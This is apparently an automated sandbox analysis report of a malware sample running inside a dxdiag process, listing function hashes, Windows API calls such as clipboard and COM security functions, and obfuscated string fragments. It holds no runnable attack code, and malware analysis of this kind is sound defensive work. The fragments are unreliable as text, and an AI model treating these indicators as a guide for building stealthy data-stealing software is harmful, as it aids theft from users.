                                                                                          • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: tuv
                                                                                          • API String ID: 0-2475268160
                                                                                          • Opcode ID: 692413315616f7dcebff6ff457f6b3838c60e2c9e7b6f7554dd79316d44026a4
                                                                                          • Instruction ID: 96cc1be5c7b42f4822ccf6fdabcc1d0a1cf8542e79077bfe6f2257edbdd6f4ef
                                                                                          • Opcode Fuzzy Hash: 692413315616f7dcebff6ff457f6b3838c60e2c9e7b6f7554dd79316d44026a4
                                                                                          • Instruction Fuzzy Hash: 2B6133B6604700CFC7208F24D8923A3B3F2FF96318F18456EE996477A1E739A945C759
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID: @
                                                                                          • API String ID: 2994545307-2766056989
                                                                                          • Opcode ID: a54cd9664649f0a3eb3b986b2c8d66ddc9897b79c163bf161da4d5756e812fe2
                                                                                          • Instruction ID: 1421818bc4f15c0d032df179158ed2797c8d4970c2420d5e39c05150b2e3af5d
                                                                                          • Opcode Fuzzy Hash: a54cd9664649f0a3eb3b986b2c8d66ddc9897b79c163bf161da4d5756e812fe2
                                                                                          • Instruction Fuzzy Hash: C33100B15183048BC314DF18E8C162BBBF8FB9A314F15A92DE68687391D3759908CB9A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: \U^_
                                                                                          • API String ID: 0-352632802
                                                                                          • Opcode ID: b233260ff75ba58cbb536c0014e0eb0df055bc4e14581868770786c388d706bb
                                                                                          • Instruction ID: 5fa690bb4235e6f9a1b833386d74a381627e7adb8b1be8a89cbf23ee07b36487
                                                                                          • Opcode Fuzzy Hash: b233260ff75ba58cbb536c0014e0eb0df055bc4e14581868770786c388d706bb
                                                                                          • Instruction Fuzzy Hash: D011E23060C3808FD324DF3495549ABBBA5EFD7748F545A2CE4C56B281C735980A8FAA
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d2093543fb022584d977dfc9d50ca098b55c829935c8d8b3e8abbd63342e29df
                                                                                          • Instruction ID: 4dc62bf772fc277d12a1bce7bd5d1620b66fc78fd85d4c56ed750eab30f1286c
                                                                                          • Opcode Fuzzy Hash: d2093543fb022584d977dfc9d50ca098b55c829935c8d8b3e8abbd63342e29df
                                                                                          • Instruction Fuzzy Hash: 1C720675604B408FD714DF38C58539ABBE1AF95314F098A3ED9EB877D2E638A445CB02
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: 7e2f85c664c8434edd563ad3eec3cf26f3dbdf93c28ccb518c6c18397a03e6ac
                                                                                          • Instruction ID: 42590aa1c4a3029240d7faad05c1566b36b776a36cf424c854185cc8c2ee326e
                                                                                          • Opcode Fuzzy Hash: 7e2f85c664c8434edd563ad3eec3cf26f3dbdf93c28ccb518c6c18397a03e6ac
                                                                                          • Instruction Fuzzy Hash: 58717A31A043014BC714AF29E890A3FB7A6EFDD750F1AD43EE4868B365DB349C11878A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: 971fb4683366840521f2c77239d6da1bf588dd11a8c1239e3b899356031a604b
                                                                                          • Instruction ID: c4b29f3e4ef49d663a7ff3a53f189fc49867f14e84c221a6ac5e24e09d39c3ba
                                                                                          • Opcode Fuzzy Hash: 971fb4683366840521f2c77239d6da1bf588dd11a8c1239e3b899356031a604b
                                                                                          • Instruction Fuzzy Hash: 80618B766083005FD728DF29D891B7BB793EBD8304F2D942ED5868B351EA75AC01CB89
                                                                                          APIs
                                                                                          • GetUserDefaultUILanguage.KERNELBASE ref: 00434C09
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID: DefaultLanguageUser
                                                                                          • String ID: t
                                                                                          • API String ID: 95929093-2238339752
                                                                                          • Opcode ID: 3fa4c25dce8568a0724ebcbfa99840aa77e9227c5342f76fc488d9eef6af0589
                                                                                          • Instruction ID: 08a8b9a0e37a212ebea7de5d04b95149eac63241ee44ff142c93878423301f38
                                                                                          • Opcode Fuzzy Hash: 3fa4c25dce8568a0724ebcbfa99840aa77e9227c5342f76fc488d9eef6af0589
                                                                                          • Instruction Fuzzy Hash: 53F0FF34808298CFDB10DF68D4943EEBBF16F66304F1880ACC08497382D37A9A84CB12
                                                                                          APIs
                                                                                          • GetForegroundWindow.USER32 ref: 0043B720
                                                                                          • GetForegroundWindow.USER32 ref: 0043B740
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID: ForegroundWindow
                                                                                          • String ID:
                                                                                          • API String ID: 2020703349-0
                                                                                          • Opcode ID: a4781643aa2d8fd57512208f1c3e62aa4b8d5176cb57333a04816d28865289df
                                                                                          • Instruction ID: 191facca889f69fa70601903ca8693053aaba1cbaba24685dbffd0b384c421fe
                                                                                          • Opcode Fuzzy Hash: a4781643aa2d8fd57512208f1c3e62aa4b8d5176cb57333a04816d28865289df
                                                                                          • Instruction Fuzzy Hash: 7ED0A7FDD20110EBC604AB71FC4A41B3A1AEB4722DB545539EC0343352DA39782E868F
                                                                                          APIs
                                                                                          • RtlReAllocateHeap.NTDLL(?,00000000,?,?,?,?,0040B29B,?,00000001,?,?,?,?,?,?,?), ref: 0043B452
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocateHeap
                                                                                          • String ID:
                                                                                          • API String ID: 1279760036-0
                                                                                          • Opcode ID: c927d8c6f07db5a3335dd59de96673b47f735cea6f05c616f97ff7e83687720b
                                                                                          • Instruction ID: a89ac6462aaa6a8a5f29c09ee71e481237a955995f4f3f89a98fbf9f2f2a6ed3
                                                                                          • Opcode Fuzzy Hash: c927d8c6f07db5a3335dd59de96673b47f735cea6f05c616f97ff7e83687720b
                                                                                          • Instruction Fuzzy Hash: FBE0E536904210EBD2002B357C06B177678EF9B715F060436F40152115D739E801C5DE
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID: BlanketProxy
                                                                                          • String ID:
                                                                                          • API String ID: 3890896728-0
                                                                                          • Opcode ID: 83941c5ff406fddefe2a55fc962621e55030b9d07cbba56e81ba996dd76ec11c
                                                                                          • Instruction ID: 1146a04256a80fd680d05c5d227ab35205256b262c73fed29a8c8dc337ffb545
                                                                                          • Opcode Fuzzy Hash: 83941c5ff406fddefe2a55fc962621e55030b9d07cbba56e81ba996dd76ec11c
                                                                                          • Instruction Fuzzy Hash: E00114B5249702CFE310CF64D5D8B4BBBF1AB84304F14892CE8A54B385C7B9A9498FC2
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID: BlanketProxy
                                                                                          • String ID:
                                                                                          • API String ID: 3890896728-0
                                                                                          • Opcode ID: f641e3c77b6ce86b3dd807bf46eed919c30205036380bbbe1e710ba534cd93a1
                                                                                          • Instruction ID: cdfd11b330a352dee93e16416f8877f043d61a2de36bf40ddff772d5b84e5129
                                                                                          • Opcode Fuzzy Hash: f641e3c77b6ce86b3dd807bf46eed919c30205036380bbbe1e710ba534cd93a1
                                                                                          • Instruction Fuzzy Hash: C601F9B86097058FE305DF28D498B5ABBF1FB89304F10881CE4958B3A1C779A949CF81
                                                                                          APIs
                                                                                          • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040CE03
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID: Initialize
                                                                                          • String ID:
                                                                                          • API String ID: 2538663250-0
                                                                                          • Opcode ID: 61d928746ba4ae58ea54a0875f1c3d0382ed5290a25c5d8e3ced17899992ccae
                                                                                          • Instruction ID: f1973b7854016afe0481596635c710bb103935c4c1c993b3491e04eff0e8badb
                                                                                          • Opcode Fuzzy Hash: 61d928746ba4ae58ea54a0875f1c3d0382ed5290a25c5d8e3ced17899992ccae
                                                                                          • Instruction Fuzzy Hash: 01D0A7345545486BD250A75CDD0BF563A5C9703B29F400239B763D61D1D9506920C669
                                                                                          APIs
                                                                                          • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040CE35
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeSecurity
                                                                                          • String ID:
                                                                                          • API String ID: 640775948-0
                                                                                          • Opcode ID: 9269880a45a3c80f6ec8299234c73a1314589920fa48725fb3d67ea21efaca66
                                                                                          • Instruction ID: 9bb2948b1e33ad1240181575e0f5375bfb099cf60bc3df2fdc322b3d55e14239
                                                                                          • Opcode Fuzzy Hash: 9269880a45a3c80f6ec8299234c73a1314589920fa48725fb3d67ea21efaca66
                                                                                          • Instruction Fuzzy Hash: CAD0C9343D83007AF5748B48ED53F1432169702F11FB00629F322FE6D4C9E07121861D
                                                                                          APIs
                                                                                          • RtlFreeHeap.NTDLL(?,00000000,00000000,00412F5C), ref: 00439B80
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID: FreeHeap
                                                                                          • String ID:
                                                                                          • API String ID: 3298025750-0
                                                                                          • Opcode ID: d0720c9dfbe2666778a34d5469e5ae55c8d5964329e0fb1cba2b62a2f878fbc3
                                                                                          • Instruction ID: 8d81dc3d2e1c71e2762f942217139477682170591cb2c618f1865e02491f5b7e
                                                                                          • Opcode Fuzzy Hash: d0720c9dfbe2666778a34d5469e5ae55c8d5964329e0fb1cba2b62a2f878fbc3
                                                                                          • Instruction Fuzzy Hash: 76D0C935505126EBCA506B28BC15BC73A989F4A671F0708A1B4006A075C765EC919AD8
                                                                                          APIs
                                                                                          • RtlAllocateHeap.NTDLL(?,00000000,?,?,00414E57,00000400), ref: 00439B50
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocateHeap
                                                                                          • String ID:
                                                                                          • API String ID: 1279760036-0
                                                                                          • Opcode ID: a95155655fbe3eb8f0e77a05497d8175f8be12db265ae77d37b3e7249a9ffdc4
                                                                                          • Instruction ID: 3d340f236624c1ae318c051adf9ea47d82c8c11c3707c94fc3fa8f772c7fe72e
                                                                                          • Opcode Fuzzy Hash: a95155655fbe3eb8f0e77a05497d8175f8be12db265ae77d37b3e7249a9ffdc4
                                                                                          • Instruction Fuzzy Hash: 91C04831145224ABDA10AB15EC09B8A3AA8AF496A1F1A04A6B005660B28760AC929A98
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: $ $!$"$$$&$'$*$,$.$.$/$/$1$3$3$4$6$8$8$9$:$@$@$A$D$D$D$E$F$H$I$I$J$J$K$L$L$M$N$O$O$P$R$T$U$V$V$W$X$Y$Y$Z$Z$Z$[$\$\$]$^$`$`$`$`$`$`$`$`$a$a$a$a$a$a$a$a$b$b$b$b$b$b$b$c$c$c$c$c$c$d$e$f$f$f$g$h$h$j$l$l$m$n$o$p$p$p$q$q$r$r$r$s$t$t$u$v$w$w$x$x$y$y$z${${$|$|$|$}$~$~
                                                                                          • API String ID: 0-970517751
                                                                                          • Opcode ID: b935f384ca54683a4ca31a6a4a577467b87093545c2e1a959a98bc83544e7568
                                                                                          • Instruction ID: eb2ea25b501750350b52f307c1a87468cb49357f6a4e324b0e4b270eb01e31bc
                                                                                          • Opcode Fuzzy Hash: b935f384ca54683a4ca31a6a4a577467b87093545c2e1a959a98bc83544e7568
                                                                                          • Instruction Fuzzy Hash: 45039D7110C7C08AD325DB3885843DFBBE2ABD6314F188A6EE1E9873D2D6798585C71B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: #l%n$$h+j$*|.~$*;$*;$.`1b$.p r$3d4f$3M$5$5;$5;$5I$96$96$:xz$:xz$;H$;=$?1$BSB$KX&Z$KM$LM$\$\]$tv
                                                                                          • API String ID: 0-2144453301
                                                                                          • Opcode ID: 2fafde579302429f393e93c8b007b0d9fe794dcac7e70ccc745c0248d3875073
                                                                                          • Instruction ID: 02eb6ca72729b77c0c517bad882bc54f1721a4cd1cfb35057a0e712941df6505
                                                                                          • Opcode Fuzzy Hash: 2fafde579302429f393e93c8b007b0d9fe794dcac7e70ccc745c0248d3875073
                                                                                          • Instruction Fuzzy Hash: C56250B560C3918AD330CF14E841B9BBBF1FBC2304F80892DD9D99B251D675994ACB9B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: #$5$C$X$X$Y$Y$Z$Z$\$`$e$i$j$~
                                                                                          • API String ID: 0-3294723363
                                                                                          • Opcode ID: 218b22c1c0bb5ff38fa90c5a0a5a95447d190bf781458c7b06e1a19171da4b10
                                                                                          • Instruction ID: d06cdc3dbbba6fd9ac46771ee23930370a381fe40efeef2ce659a2012e58e6f7
                                                                                          • Opcode Fuzzy Hash: 218b22c1c0bb5ff38fa90c5a0a5a95447d190bf781458c7b06e1a19171da4b10
                                                                                          • Instruction Fuzzy Hash: F4910623A0D7D14AD3058538880435FEED30BEA224F6ECA6ED4E9873C6C57DC90687A3
                                                                                          APIs
                                                                                            • Part of subcall function 0043B480: LdrInitializeThunk.NTDLL(0043D4FB,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043B4AE
                                                                                          • FreeLibrary.KERNEL32(?), ref: 0041A21A
                                                                                          • FreeLibrary.KERNEL32(?), ref: 0041A29B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID: FreeLibrary$InitializeThunk
                                                                                          • String ID: I,~M$PQ$cba`$cba`$cba`$wEtG
                                                                                          • API String ID: 764372645-3803835663
                                                                                          • Opcode ID: 47063c938c01330124c9dc59b6d375a3b8a360990f39732c0e3748d67b9dcd4f
                                                                                          • Instruction ID: ce701afe96e54189f6fff091c8333c98f5ae15aa60c98f01a083bef101dadeb2
                                                                                          • Opcode Fuzzy Hash: 47063c938c01330124c9dc59b6d375a3b8a360990f39732c0e3748d67b9dcd4f
                                                                                          • Instruction Fuzzy Hash: C59235746093409FE714CF65D891B6BBBE2EBD5300F28882EE58487391D7799C81CB9B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 0MB$3M$;=$?1$AK$BSB$NO$cba`$sF$~$_A
                                                                                          • API String ID: 0-1547998400
                                                                                          • Opcode ID: 0979c079486d7a7852b00a598c97ab370eb9193afc66a543d39376835cc69fb4
                                                                                          • Instruction ID: f216ed7a0f42d5910be755489e032facae88754772da87564cfe1883718cc258
                                                                                          • Opcode Fuzzy Hash: 0979c079486d7a7852b00a598c97ab370eb9193afc66a543d39376835cc69fb4
                                                                                          • Instruction Fuzzy Hash: 03121436A187228BC324DF28D8806ABB3F1FFC5344F56896DE5858B360E7749D05CB86
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: z%|$"r,t$&f?x$3v#H$<b"d$=j9l$cba`$cba`$Z\$^P
                                                                                          • API String ID: 0-3047316687
                                                                                          • Opcode ID: 45c83a3ddc5386c7eaecb6d0721308efe7616dc8ac7a87c6f5778f813dbd46f5
                                                                                          • Instruction ID: 146473404e5499b4986dffa8d26f26e1c07bf5215faae6f3d7194190b628d0b4
                                                                                          • Opcode Fuzzy Hash: 45c83a3ddc5386c7eaecb6d0721308efe7616dc8ac7a87c6f5778f813dbd46f5
                                                                                          • Instruction Fuzzy Hash: C2D124B9608380DFE324DF15E88176BB7E1FBD5304F94982DE58587261D738D901CB4A
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                                                          • String ID: K
                                                                                          • API String ID: 2832541153-856455061
                                                                                          • Opcode ID: 027abc228ed841da0674a97a3735ab7f080d79d715808bd082ae78d0cbe3e8e1
                                                                                          • Instruction ID: 513562b2ac7e6d1d4712994eff6d7c1bc04b9d90a7c3137532ed1f51a9abc6ba
                                                                                          • Opcode Fuzzy Hash: 027abc228ed841da0674a97a3735ab7f080d79d715808bd082ae78d0cbe3e8e1
                                                                                          • Instruction Fuzzy Hash: 34418E6150C7818ED310AF7C988826FBFE09B96224F044A6EE8E5872D2E6389549C797
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: /37)$8>&:$YAG~u$`;;2$`;;2$u$}x$
                                                                                          • API String ID: 0-2031701488
                                                                                          • Opcode ID: afbf182f086d4cb3678fef5cd9cf034a3b5aeb1cf8c39da1fee8d2667e1554dd
                                                                                          • Instruction ID: 68186ed99558166210f0fcd42b99c8c2f62b0175f04f1e675d22ffc3d0d5a109
                                                                                          • Opcode Fuzzy Hash: afbf182f086d4cb3678fef5cd9cf034a3b5aeb1cf8c39da1fee8d2667e1554dd
                                                                                          • Instruction Fuzzy Hash: 5CC1F67150C3918BD319CF2984A03ABBFD2AFD7215F1889ADE4D25B3C2D6398D09C796
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: );?g$9nI9$;>*2$='0{$[93=$cba`$fa
                                                                                          • API String ID: 0-154584671
                                                                                          • Opcode ID: 3e51a02978bc99ce7d016768a4801fe2a924607298026115374562d3702a8947
                                                                                          • Instruction ID: 21be1e4f2e6752f9380b4aadbcf4cd787e7e0f4b09ea5b297d7e9ef9a1fb0c4b
                                                                                          • Opcode Fuzzy Hash: 3e51a02978bc99ce7d016768a4801fe2a924607298026115374562d3702a8947
                                                                                          • Instruction Fuzzy Hash: 3FC1077560C3A08FC3118F29D89066BBBE2AF96310F588A6DF4E1573D2C7398D45CB5A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: @@=:$I6F8$J:<<$P9&'$n$-+
                                                                                          • API String ID: 0-2611983443
                                                                                          • Opcode ID: c45ed84dc9fbc92dafa2b4c7a388b636a73cdc03055905ef9755abf4baf2e3c6
                                                                                          • Instruction ID: c878bbecd244461bdf7002393a4f7c895ed20244a5d7bed5cbfbc41bef4b96db
                                                                                          • Opcode Fuzzy Hash: c45ed84dc9fbc92dafa2b4c7a388b636a73cdc03055905ef9755abf4baf2e3c6
                                                                                          • Instruction Fuzzy Hash: 26526A7550C3908FC725DF25C8406AFBBE1AF96304F08866EECE45B392DB398946C796
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: =z9|$JK$Vj)l$}~$CE$GI
                                                                                          • API String ID: 0-2837980318
                                                                                          • Opcode ID: 1d78ecb592161844fdb1d70b49100f2adcb6c2f4e1b931356bca3f21c3e11650
                                                                                          • Instruction ID: e6571e83d39cc411a0f6c30d6b338ee8b8b0e658176ffc556d576db30a7076d6
                                                                                          • Opcode Fuzzy Hash: 1d78ecb592161844fdb1d70b49100f2adcb6c2f4e1b931356bca3f21c3e11650
                                                                                          • Instruction Fuzzy Hash: 5602FFB554C3408FC704DF69D8926ABBBE2EFD5314F08986DE4C68B351E7388605CB9A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: #$0$AGsW$P$k
                                                                                          • API String ID: 0-1629916805
                                                                                          • Opcode ID: a92c176f258902a07af39c1f8e4a41f6c7503ef90e7a1abad74dc0064dca0dbd
                                                                                          • Instruction ID: 8816b6b3b95a3b8c405e0a0f8c285763547ceed8af8c8b555c70c7a9f783aa76
                                                                                          • Opcode Fuzzy Hash: a92c176f258902a07af39c1f8e4a41f6c7503ef90e7a1abad74dc0064dca0dbd
                                                                                          • Instruction Fuzzy Hash: 1CC1F4317183918ED328CF39D4513ABBBD2AFD2304F68866ED4D58B2D1D6798449C71B
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID: FreeLibrary
                                                                                          • String ID: 3$qjjw
                                                                                          • API String ID: 3664257935-3235754969
                                                                                          • Opcode ID: 3641d3b1d95d9d0e2252580d4e70a4747529bd2a480d62c0a42bd322f018f1c7
                                                                                          • Instruction ID: e0248e225440bb7285b8803733d60271f7e61eb44642cbaa2f092a8799675a72
                                                                                          • Opcode Fuzzy Hash: 3641d3b1d95d9d0e2252580d4e70a4747529bd2a480d62c0a42bd322f018f1c7
                                                                                          • Instruction Fuzzy Hash: 29A16C717083919BE7248F24C8917ABBBD2EFD2340F18856ED5C94B3C6DB384405D796
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: '|$-.$12$i>}0
                                                                                          • API String ID: 0-2215797287
                                                                                          • Opcode ID: 14e10f65ad8321b80ffaa5da7a8a4b0c9f74e6b5be133c58881cb5dac5cd0c39
                                                                                          • Instruction ID: 8eb2e6b3675630783b81e0cc301adcc701fe371486659d4b9ed52cc1e956938d
                                                                                          • Opcode Fuzzy Hash: 14e10f65ad8321b80ffaa5da7a8a4b0c9f74e6b5be133c58881cb5dac5cd0c39
                                                                                          • Instruction Fuzzy Hash: 0FD1ED7220C3118FD718CF29D89179FB7E2EFC1314F15892DE4958B281EB78950ACB96
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: `$a$b$c
                                                                                          • API String ID: 0-1877310501
                                                                                          • Opcode ID: a9c6c59b3ed1c792c943f583d7b073ffa41b41ed4492c6662d551fa54f329e35
                                                                                          • Instruction ID: 3c49db235e8ab65d0d0325bcf5be7f0773c557a123825650d4b9bdb7a00939e4
